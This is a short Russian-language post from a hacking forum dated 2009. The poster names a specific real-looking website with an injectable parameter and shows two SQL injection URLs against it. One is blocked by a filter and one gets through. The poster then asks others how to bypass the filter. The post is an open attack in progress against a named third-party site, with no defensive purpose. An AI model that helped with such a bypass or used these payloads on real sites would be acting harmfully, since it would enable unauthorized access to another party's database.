19.12.2009, 17:44
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
http://www.sendas.org.ec/contenido.php?idM=[SQL]
Ещё один фильтр SQL иньекций с новым подходом.
Режет union и select при условии, что те упоминаются вместе и последовательно.
То есть так:
Код:
http://www.sendas.org.ec/contenido.php?idM=-1+union+select+1--&idP=0&lan=1
Ошибка 403.
А вот так:
Код:
http://www.sendas.org.ec/contenido.php?idM=-1+select+union+1--&idP=0&lan=1
Работает.
Как обойти?
Последний раз редактировалось Nightmarе; 19.12.2009 в 17:46..
|
|
|